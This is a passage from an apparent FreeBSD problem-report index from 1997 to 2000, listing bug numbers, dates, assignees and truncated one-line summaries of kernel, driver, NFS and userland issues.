fails during mount-operati o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f s [1997/07/06] gnu/4042 obrien gdb stackframe in static library shows no o [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/26] bin/4176 restore gets confused when run over pipe o [1997/07/28] kern/4186 peter nfsiod, panic, page fault in kernel mode o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/06] kern/4240 kernel fails to recognise 2nd serial port o [1997/08/10] kern/4265 Panic in dsinit when multiple FreeBSD sli o [1997/08/12] kern/4284 paul le0 goes OACTIVE after some time o [1997/08/13] kern/4295 SL/IP difficulties between 2.2.1 & 2.2.2 o [1997/08/16] kern/4312 arp table gets messed up, syslog "gateway o [1997/08/17] kern/4327 peter NFS over TCP reconnect problem s [1997/08/19] kern/4338 New device driver (Cyclades Cyclom-Z) o [1997/08/22] bin/4357 wosch bug in adduser script causes duplicate UI o [1997/09/02] kern/4454 X drops characters/locks up keyboard when o [1997/09/03] bin/4460 lpd hangs exiting (IE in ps table) o [1997/09/11] kern/4513 System lockup appears to be VM related. o [1997/09/14] i386/4533 Server with Cyclom-Y PCI card rebooted at o [1997/09/21] kern/4600 peter nfs lookups might give incorrect result o [1997/09/30] kern/4663 checkalias panic o [1997/10/01] kern/4666 dfr umount -f doesn't seem to work o [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/03] bin/4683 imp restore doesn't correctly handle "sparse" o [1997/10/16] kern/4774 trying to use IBCS2 shared libraries cras o [1997/10/16] kern/4782 dillon Under certain conditions, several krsh's o [1997/10/31] kern/4909 de ethernet driver is crazy on 100base o [1997/11/03] kern/4927 kernel does not check any quota and permi o [1997/11/05] bin/4949 rpc.rquotad stat()s fs with quota file in o [1997/11/15] conf/5062 login.access not evaluated correctly o [1997/11/18] kern/5085 System crash during mount command for CD o [1997/11/23] i386/5128 Adaptec 2940U Timeouts with QUANTUM disk o [1997/12/06] kern/5244 F00F workaround dosn't always work on SMP o [1997/12/14] bin/5297 will make incompatibility with System V style o [1997/12/19] kern/5347 peter DEC (de0) ethernet card has no buffers af o [1997/12/30] kern/5396 fdesc fs crashes system o [1997/12/31] i386/5401 peter de0 selects wrong media when reconnected f [1998/01/08] kern/5456 After writing more than 100MB to SCSI Exa o [1998/01/16] kern/5513 luigi new PnP code is BAD (soundcards) o [1998/01/26] misc/5574 bootpd gets timezone incorrectly o [1998/01/27] kern/5587 session id gets dropped o [1998/01/29] kern/5598 Support for magneto-optic SCSI devices wi o [1998/01/31] kern/5611 bind does not check sockaddr->sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/04] kern/5643 NCR 810/815 do not handle rewind correctl o [1998/02/19] kern/5794 Kernel Panic o [1998/02/28] kern/5877 sb_cc counts control data as well as data f [1998/03/11] kern/5975 can't boot freebsd: fatal trap12: page fa o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 paul lnc driver does not work correctly with A f [1998/03/22] kern/6103 panic: ffs_valloc: dup alloc o [1998/03/28] bin/6162 kinit does not default to the current use f [1998/04/03] kern/6203 kernel panics with "blkfree: freeing free f [1998/04/03] conf/6205 NFS/NIS freak out o [1998/04/04] kern/6212 dillon Two bugs with MFS filesystems fixed, one o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 f [1998/04/08] kern/6252 sos ide cdrom hangs system when on same bus a o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using o [1998/05/03] kern/6506 system will not soft reboot a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/12] kern/6603 ncr driver hangs under high load f [1998/05/17] kern/6670 PANIC on boot with FreeBSD 3.0 (same comp o [1998/05/25] kern/6751 audio cd play suddenly stops. o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current o [1998/05/27] misc/6773 kris [PATCH] tempnam.c security problems s [1998/06/02] bin/6830 will make(1) exhibits confusing and non-standa o [1998/06/05] kern/6865 OS crashes when exiting shell with suspen o [1998/06/10] kern/6908 kernel crash from user land o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] kern/7038 shimon Kernel panic caused by DPT driver (Got a s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 mdodd 3Com 3C509 locks up, or has >1000ms rtt u s [1998/07/05] kern/7169 cannot use accton on a append-only file s [1998/07/06] misc/7190 phk "Invalid partition table" after new insta s [1998/07/10] kern/7237 NCR SCSI driver ch0 troubles o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/26] kern/7405 dillon in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 dillon Machine crashes do not occur very often, s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/08/10] kern/7557 dillon -current machine running Diablo, lockup, s [1998/08/10] kern/7561 CDROM (wcd) is prone to lock up system/pr o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/09/09] bin/7872 dwmalone [PATCH] mountd(8) can apply flags to wron o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/10] kern/7880 mount_cd9660 incorrect on multitrack CD-R o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/28] misc/8070 can't get a system with an NCR 810 contro o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/30] gnu/8099 obrien [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can f [1998/10/05] kern/8158 sio driver breaks in 2.2.7R in kernels wi o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/13] kern/8312 Under heavy load, the system panics with o [1998/10/14] bin/8322 Mail doesn't respect REPLYTO in .mailrc o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r f [1998/11/05] kern/8580 dillon Hanging NFS pagein in nfs_bio.c (2.2.7, w o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] ports/8622 markm exmh2 has problems with some date formats o [1998/11/10] bin/8646 peter Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device f [1998/11/11] kern/8657 dillon nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S f [1998/11/25] bin/8865 dwmalone syslogd hangs with serial console o [1998/11/29] conf/8903 dillon /etc/rc can do NFS mounts before the netw o [1998/12/02] kern/8940 system clock runs extremely slowly (and s f [1998/12/06] kern/8981 this also fixes X crashes and sio silo ov o [1998/12/16] kern/9095 swap detect error o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 peter [patch] squid does not join a multicast g o [1998/12/31] bin/9252 [patch] login program "login" don't set K o [1999/01/06] kern/9355 can't select() for writes on a bpf o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9408 parameter reversed to a pci_cfgwrite in p o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/11] bin/9440 obrien amd can't mount filesystems with type:=uf o [1999/01/13] kern/9478 support for running a script from kldload f [1999/01/14] kern/9487 pcm: mixer's synth and cd devices are swa o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi o [1999/01/17] kern/9548 UNION fs corrupts data and has undefined f [1999/01/17] kern/9550 sos The latest -current as of 17 January has o [1999/01/21] kern/9599 SMP hang after reseting CPU 1 s [1999/01/22] docs/9618 asmodai many typos in groff_mm(7) f [1999/01/25] kern/9673 ISO CD-ROM Problem f [1999/01/28] i386/9759 Tar process hangs on buggy tapes o [1999/02/01] kern/9862 system crashes writing to msdos jaz disk o [1999/02/02] kern/9883 MGET()(and variants) return NULL with M_W s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with f [1999/02/09] bin/9982 ume inet_addr(3) should be return 32bit uint. o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/13] kern/10066 problem with a X-Window and syscons drive f [1999/02/14] i386/10089 sos ATAPI tape driver (wst) doesn't handle En o [1999/02/15] kern/10107 dillon interlock situation with exec_map and a p f [1999/02/25] bin/10264 davidn passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] misc/10302 jkh installer o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/08] kern/10492 broadcast IP address can be set on interf o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp f [1999/03/16] i386/10626 RTC BIOS diagnostic error on install o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/24] bin/10774 sio0 doesn't work well, i belive the prob o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/29] i386/10862 sos wd.c STILL cannot recognize correct disk o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/03/30] misc/10879 Cannot build aout binaries under 3.1-RELE o [1999/03/30] bin/10880 Profiler libraries missing o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/03] i386/10935 PCI cards detected twice o [1999/04/05] i386/10969 kernel fails to compile with ccs0 f [1999/04/06] i386/10983 lnc NIC driver doesn't work o [1999/04/06] bin/10991 lpd hangs system if printer not ready on o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/11] kern/11084 3.1-R kernel trap 12 with interrupts o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/18] kern/11208 Complete system hang/freeze. No PANIC me o [1999/04/20] bin/11247 des fetch doesn't notice FTP error after RETR o [1999/04/21] kern/11255 Fore System ATM Card not working o [1999/04/21] kern/11266 frequent crashes with "Page fault, fatal o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] kern/11366 Filesystem can cause hang/crash in certai o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R o [1999/04/29] i386/11395 ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/02] i386/11454 mkdir() and chdir() doesn't check argumen o [1999/05/03] kern/11462 CS network interface driver (for CS89XX b o [1999/05/03] bin/11464 obrien union copies likely broken for alpha egcs o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 msmith CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] kern/11513 cannot mount CD-ROM: Device not configure o [1999/05/05] misc/11523 3.1-STABLE BRIDGE option does not work o [1999/05/05] misc/11525 dwmalone [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio f [1999/05/12] kern/11679 httpd and perl5 processes stuck in "nocha o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11692 3.1-stable deadlock o [1999/05/13] kern/11697 gibbs Disk failure hangs system f [1999/05/18] kern/11766 darrenr Can not traceroute through ipnat. o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored f [1999/05/20] misc/11800 gibbs Problem with scsi AHA2940 and sony SDT-20 o [1999/05/20] i386/11801 Remounting CD on IDE CDROM after eject fa o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/23] kern/11867 Sound driver loses interrupts, no sound o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] kern/11915 access system call says file is readable o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. f [1999/06/02] i386/11991 fdisk does not assign slices to unused pa o [1999/06/02] bin/11992 /usr/src/sbin/mountd/mountd.c has '#ifdef o [1999/06/04] kern/12022 phk System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes f [1999/06/06] kern/12062 sa tape driver with Cipher 60M SCSI QIC t o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/09] kern/12104 Certain cdcontrol commands don't work pro o [1999/06/10] bin/12120 named crashes. o [1999/06/12] gnu/12175 obrien gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang f [1999/06/17] kern/12262 pcm sound driver with SB16pnp does not ap o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/21] kern/12320 error 6: panic: cannot mount root (2) o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura s [1999/06/24] kern/12381 bde Bad scheduling in FreeBSD o [1999/06/25] conf/12387 CDROM boot failure on Thinpad 770X, 380ED o [1999/06/25] kern/12394 3.2-RELEASE, rl0 ethernet interface freez o [1999/06/28] kern/12434 signal 11 (core dumped) on mysqld when ma o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken f [1999/07/06] i386/12529 Linksys ether16 NE2000 compat. won't conf o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/07] docs/12557 nik There are no man pages for the widely use o [1999/07/09] misc/12577 Can't link code using catopen o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/14] misc/12640 Can use 2nd CD-ROM for fixit mode. o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/27] alpha/12832 alpha config -g creates broken Makefile in 3.2- o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/28] misc/12856 installworld over nfs broken (3.2S) o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/07/30] kern/12884 Hot to panic FreeBSD-3.2-Release o [1999/08/02] ports/12930 asami libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] kern/12991 system queue is cleared when a port or pi f [1999/08/06] kern/12996 ifconf in sys/net/if.c returns larger buf o [1999/08/07] conf/13013 Selecting CDROM as install media doesn't o [1999/08/08] misc/13027 sysinstall has no /dev entry for wfd0s4 ( f [1999/08/10] i386/13058 Installation hangs after commit o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/18] kern/13234 .../netinet/ip_input.c should include opt o [1999/08/24] bin/13350 make clean in bsd.obj.mk no longer proper o [1999/08/25] misc/13378 Tecra 8000 hangs in UserConfig, cannot co o [1999/08/25] kern/13382 Only 1 parallel port supported if pps ena o [1999/08/26] kern/13405 syslogd get system hang o [1999/08/27] gnu/13427 obrien gdb reports wrong info o [1999/08/28] gnu/13438 objc forward core dump using system cc f [1999/08/29] i386/13452 changing to root device wd0s1a \n error 2 o [1999/08/29] bin/13463 /bin/sh does not handle interrupts correc o [1999/08/30] misc/13470 Old problem re-introduced: TCP sucket buf o [1999/09/01] kern/13517 hang system o [1999/09/05] kern/13587 Voxware MIXER_READ ioctl corrupts memory o [1999/09/06] kern/13593 Problems with FIFO and select o [1999/09/07] kern/13612 gibbs "Timedout SCB handled by another timeout" o [1999/09/07] kern/13630 system halts after npx0 detected on 3.2 i o [1999/09/07] kern/13632 Floppy hangs system o [1999/09/08] kern/13646 Kernel Trap error when booting 3.3-RC ker f [1999/09/09] i386/13655 sysmouse, signal 10 and XF86_S3 o [1999/09/10] bin/13679 ncurses-based programs eat 100% CPU after o [1999/09/10] bin/13691 fenner tcpslice cannot extract over 2GB part of o [1999/09/11] bin/13703 MCNP compilation problem o [1999/09/12] bin/13711 root fs not properly unmounted after shut o [1999/09/12] ports/13714 stb netatalk-1.4b2+asun2.1.3 fails chmod g+s o [1999/09/13] gnu/13729 strip(1) exits with an error on script fi o [1999/09/13] kern/13740 wrong IP statistics o [1999/09/15] kern/13757 wpaul tl0: adapter check: 180005 mesages keep c f [1999/09/15] i386/13765 memory problem: compilation of emacs dies o [1999/09/15] bin/13768 sh MAKEDEV cdN creates all cd(N-1)-device o [1999/09/16] conf/13775 multi-user boot may hang in NIS environme o [1999/09/16] conf/13785 jkh boot block/manager problem at installatio o [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/18] i386/13811 ide cdrom stops recognizing audio cdroms f [1999/09/20] i386/13857 Problem with switching between processes s [1999/09/22] alpha/13912 alpha unaligned access Problem seems to be aff o [1999/09/23] misc/13920 pppd acts differently on 3.3-RELEASE ("mi o [1999/09/24] kern/13941 ncr0: SCSI phase error on GENERIC kernel o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/26] bin/13980 Parameter expansion pattern removal bug i o [1999/09/27] kern/13997 phk RLIMIT_NPROC works unadequately for jails o [1999/09/28] kern/14026 Many network connections get left in the o [1999/09/28] kern/14033 Data acq process gets stuck in vmopar o [1999/09/30] kern/14060 3.3-STABLE on primary mail server panics o [1999/09/30] bin/14069 Buffer overflow in mail(1) o [1999/09/30] kern/14072 Rebooting in FreeBSD 3.3 wipes out known o [1999/10/02] kern/14096 parallel port -- ppi -- driver broken aft o [1999/10/03] bin/14102 make world -DWANT_AOUT fails in lib/compa o [1999/10/04] misc/14121 resurfaced bug in rmt preventing remote d o [1999/10/04] kern/14123 lnc driver is not working o [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/05] kern/14144 bad conversions in kern_fork() o [1999/10/07] misc/14178 FreeBSD 3.2 - Calls from CGI scripts, cro o [1999/10/07] kern/14183 grog bridge forwarding corrupted broadcast IP o [1999/10/10] bin/14250 dwmalone restore(8) can loop if tty goes away or w o [1999/10/10] misc/14254 [Fwd: clock(3) runs backwards! (fwd)] (fw o [1999/10/10] kern/14257 error 6: panic: cannot mount root (2) - d o [1999/10/12] i386/14282 Using FreeBSD 3.* ThinkPad 600E doesn't r o [1999/10/12] kern/14285 dillon NFS client appears to lose data f [1999/10/14] i386/14324 wst OR atapi drivers won't work o [1999/10/14] misc/14326 kerberos4 pam-related breakage in current o [1999/10/14] misc/14327 names used in netdb.h may conflict with n o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/15] kern/14354 grog vinum cannot compile for alpha o [1999/10/20] misc/14431 Network Interface Problem o [1999/10/20] bin/14444 enigma command can't decrypt files encryp o [1999/10/21] i386/14446 Doesn't boot on Mobile Celeron o [1999/10/25] bin/14524 markm PERL 5.005_03 Config.PM on 3.2-STABLE say o [1999/10/25] kern/14536 kernel panic on 64KB block size ufs files o [1999/10/26] kern/14546 SB128PCI work incorrect play wav-files un o [1999/10/26] kern/14549 mdodd 3C509 broken in 3.3 o [1999/10/27] kern/14566 yokota Non-kernel programs have little/no contro o [1999/11/03] i386/14689 waitpid doesn't harvest child process whe o [1999/11/04] kern/14712 root has access to NFS mounted directorie o [1999/11/05] kern/14722 TCP connections hangs in FIN_WAIT_2 for > o [1999/11/05] bin/14729 murray when sysinstall is running as init it sho o [1999/11/07] bin/14782 ypbind can not bind to Solaris NIS master o [1999/11/10] misc/14811 getpwent is not enumerating all entries i o [1999/11/10] kern/14812 de0 driver malfunctions in full-duplex o [1999/11/11] ports/14826 obrien security/fwtk smapd calls sendmail with w o [1999/11/12] bin/14844 rwhod is remotely crashable o [1999/11/12] kern/14848 Frame Relay support, corrected a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/14] kern/14890 ffs_valloc: dup alloc o [1999/11/15] misc/14895 portmap bug (when run with -v flag) o [1999/11/15] kern/14900 3.3-RELEASE panic in pmap_pte_quick() o [1999/11/16] kern/14917 grog DMA doesn't works with ALI ALADDIN M1543/ o [1999/11/16] bin/14920 install(1) hangs when intalling files sam o [1999/11/17] i386/14946 mjacob rmt - remote magtape protocol o [1999/11/17] kern/14962 PnP doesn't detect AWE64 when PnP modem i o [1999/11/17] misc/14964 Network Interface Configuration Problem a o [1999/11/18] bin/14978 lprm(1) does not kill active daemon if ho o [1999/11/19] kern/14997 NFSv3 open O_EXCL fails to set proper "at o [1999/11/19] i386/15003 mdodd 3C574 (ep0) reads bogus ethernet address o [1999/11/21] i386/15018 Printingproblem o [1999/11/22] bin/15046 obrien /sbin/dhclient-script ignores resolv.conf o [1999/11/23] bin/15070 vfprintf/cvt/__dtoa race condition in thr o [1999/11/24] i386/15074 Two different panics when running Linux b o [1999/11/24] kern/15075 Intel Etherexpress Pro timeouts when >1 c o [1999/11/24] kern/15086 Borked sscape drivers :) o [1999/11/25] kern/15087 3.3-STABLE panic while starting daemons ( o [1999/11/25] kern/15089 mmap of files from 2K-block device failed f [1999/11/26] ports/15107 green Patch for FreeBSD s/key support in OpenSS o [1999/11/26] misc/15109 problem printing graphic pages o [1999/11/27] ports/15123 rse www/apache13-modssl has PREFIX problems f o [1999/11/28] conf/15150 phantom Taking encoding scheme latin1 into accoun o [1999/11/30] misc/15190 crashing while in a multiplatform environ o [1999/12/01] kern/15204 systems panics when ktrace-ing o [1999/12/02] misc/15228 C++ exceptions+threads SIGABRTs. o [1999/12/02] kern/15235 dillon Race conditions in pipe_write causes kern o [1999/12/05] misc/15269 error server timeout downloading small fi o [1999/12/06] i386/15327 Unable to use ISA sound card with AD1816A o [1999/12/08] i386/15364 Flash Player 4 for Linux has no sound wit o [1999/12/11] kern/15420 3.3-RELEASE Kernel freeze o [1999/12/12] bin/15450 The name of the tagfile is left in the pa o [1999/12/13] bin/15471 kris Fix several buffer overflows o [1999/12/13] kern/15475 pppd(8) sets the Source Address field of o [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/14] kern/15486 Attempt to write to a "write-prot" floppy o [1999/12/15] kern/15508 disk usage after "strip" is wrong o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/17] ports/15543 hosokawa Samba + DHCP = UNKNOWN HOST NAME o [1999/12/17] i386/15548 Intel EtherExpress Pro/10+: Only 1024 byt o [1999/12/18] i386/15553 marcel Linux Emulation don't emulate accept(2) e o [1999/12/18] kern/15554 malloc fails in OMAGIC programs o [1999/12/20] bin/15581 ftp(1) file completion does not work if s o [1999/12/21] misc/15610 3.4-RELEASE installation hang on aic0 SCS o [1999/12/21] kern/15611 EIDE Large Disk Support, Newfs problem, F f [1999/12/22] i386/15631 3.4 won't install with IBM 37.5 gb disks o [1999/12/23] misc/15662 markm [PATCH] perl5 Sys::Hostname fails if no P o [1999/12/26] kern/15707 dillon bad trap in mprotect o [1999/12/29] conf/15766 My desktop display is too large, I can´t o [2000/01/01] kern/15825 dillon Softupdates gets behind, runs the system o [2000/01/01] bin/15829 peter cvs -C not_a_number core dumps o [2000/01/02] i386/15845 Driver for RealTek 8029 o [2000/01/03] misc/15869 3.4-STABLE-20000103 install fails to disk o [2000/01/03] kern/15870 small PicoBSD Kernel link fails o [2000/01/03] bin/15877 Perl 5.00503 interpreter crashes with a s o [2000/01/04] i386/15879 System hangs while watching the tv and ap o [2000/01/04] gnu/15892 NFS-exported ext2 file system makes Linux o [2000/01/04] i386/15897 Any fix for rpc.lockd on Free BSD 3.2 nfs o [2000/01/05] ports/15922 chuckr print/a2ps cannot find ogonkfied fonts [p o [2000/01/05] bin/15924 ndc restart don't preserve start options o [2000/01/07] i386/15961 System allows no keyboard input after flo o [2000/01/09] kern/16013 FreeBSD 3.3 sends ICMP reply to IP unicas o [2000/01/09] bin/16014 New cvs in -stable prints consistent erro o [2000/01/10] kern/16040 Read-only files under NFS are not seen as o [2000/01/11] misc/16068 FreeBSD 3.3 with IDE > 32GB causes Panic: o [2000/01/12] kern/16090 mdodd No buffer space available o [2000/01/13] misc/16102 root's home directory is too open o [2000/01/14] kern/16122 Incorrect SysV SHM segment accounting by o [2000/01/15] i386/16132 FreeBSD doesn't install on Notebook w/ Sy o [2000/01/17] misc/16154 modem ring kills freebsd o [2000/01/17] bin/16155 cp -p does not preserve modification time o [2000/01/17] i386/16164 "vga"/"sc" don't work when a video card i o [2000/01/18] kern/16171 mmap(2) of /dev/kmem cause kernel panic o [2000/01/18] bin/16186 [PATCH] Insecure use of strncpy() and str o [2000/01/18] misc/16197 Installation problems on IBM Thinkpad 365 o [2000/01/19] i386/16214 Driver for Intel EtherExpress 16 is unrel f [2000/01/20] misc/16238 e-bones has a Y2K bug o [2000/01/20] kern/16239 dillon NFS mount file system from multi-homed re o [2000/01/20] bin/16244 [PATCH] don't allow password re-use when o [2000/01/21] kern/16257 Kernel panic in sbdrop o [2000/01/21] i386/16269 smp dosen't work with >2 cpus on AMI Goli o [2000/01/21] bin/16271 vi has wrong len type in re_tag_conv() o [2000/01/22] kern/16299 nfs.ko can be unloaded when nfsd is runni o [2000/01/23] kern/16318 Fix for wrong interface when adding new r o [2000/01/23] alpha/16319 alpha No trailing newline in /usr/src/lib/libc/ o [2000/01/24] ports/16341 obrien Fix for minicom detecting modem status li o [2000/01/24] bin/16342 Problems with krb_realmofhost() and/or kr o [2000/01/24] ports/16343 reg bsd.port.mk cannot override make.conf. o [2000/01/25] i386/16349 Intel EtherExpress Pro/10+ card detection o [2000/01/25] bin/16353 rlogin encryption is broken on transmit s o [2000/01/27] ports/16396 reg libtool -export-symbols doesn't restrict f [2000/01/27] ports/16410 kris ssh and x forwarding problem o [2000/01/27] kern/16416 Hang on 